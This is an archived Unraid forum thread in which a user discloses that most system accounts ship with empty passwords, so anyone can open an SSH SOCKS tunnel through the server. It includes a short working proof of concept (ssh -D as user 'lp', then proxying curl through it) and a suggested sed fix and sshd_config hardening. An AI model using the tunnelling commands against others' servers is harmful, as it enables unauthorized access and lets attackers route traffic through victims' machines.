Skip to content
View in the app

A better way to browse. Learn more.

Unraid

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

No passwords for system users - unraid can be used as a rogue ssh tunnel

Featured Replies

Hello guys,

 

I couldn't find any proper channels for announcing vulnerabilities, so i think this might be the best way to catch your attention. Apologies if there are proper channels, I did not have enough time to search for them.

 

Upon looking at some logs I noticed:

```sshd[28121]: Accepted none for lp from 194.61.26.34 port 26028 ssh2```

 

Then after i took a close look at /etc/shadow I noticed almost all users don't have passwords.

While they can't actually execute commands on the system, they can see information about the system:

```

$ ssh unraid -l news
Linux 4.19.107-Unraid.
Could not chdir to home directory /usr/lib/news: No such file or directory
Connection to unraid closed.

$

```

 

But most troublesome, and maybe you guys are not aware of this, but in order to open an ssh tunnel you don't need an actual shell.

 

```

$ ssh -D 3129 -f -C -q -N lp@unraid
$ netstat -plan | grep 3129
tcp        0      0 127.0.0.1:3129          0.0.0.0:*               LISTEN      1658854/ssh   

```

Voila! then you have an ssh tunnel opened.

For now I patched my box, but of course it won't survive the reboot.

 

An easy fix would be:

`sed -i -e 's/::1/:!!:1/g' /etc/shadow`

 

Cheerio,

Mihai

 

  • Author

Btw, here's a PoC in bash (anonymized the IPs a bit, hope you don't mind :P )

```

[root@taicasimaica ~]# curl -ks4 showip.net
124.122.71.51
[root@taicasimaica ~]# ssh -D 3129 -f -C -q -N [email protected] -p 7127
The authenticity of host '[x.ninja]:7127 ([91.82.91.172]:7127)' can't be established.
ECDSA key fingerprint is SHA256:/Kg3rfHXB/0XIa2nW5UHOLAiipUztnhNDvxAyz91CP8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
[root@taicasimaica ~]# export http_proxy=socks5://127.0.0.1:3129
[root@taicasimaica ~]# curl -ks4 showip.net
91.82.91.172
[root@taicasimaica ~]#

```

21 hours ago, Mihai said:

An easy fix would be:

Would it be better to change this line in /etc/ssh/sshd_config

PermitEmptyPasswords yes

to

PermitEmptyPasswords no

 

Or.. how about if we add this to sshd_config:

AllowTcpForwarding no
Match Group root
AllowTcpForwarding yes

Then only 'root' user can set up forwarding.

  • Author

I would use these sshd configurations + setting the users disabled. I don't think having users with empty passwords is a good idea.

Thanks for the fast reply!

  • 3 weeks later...

Archived

This topic is now archived and is closed to further replies.

Account

Navigation

Search

Search

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.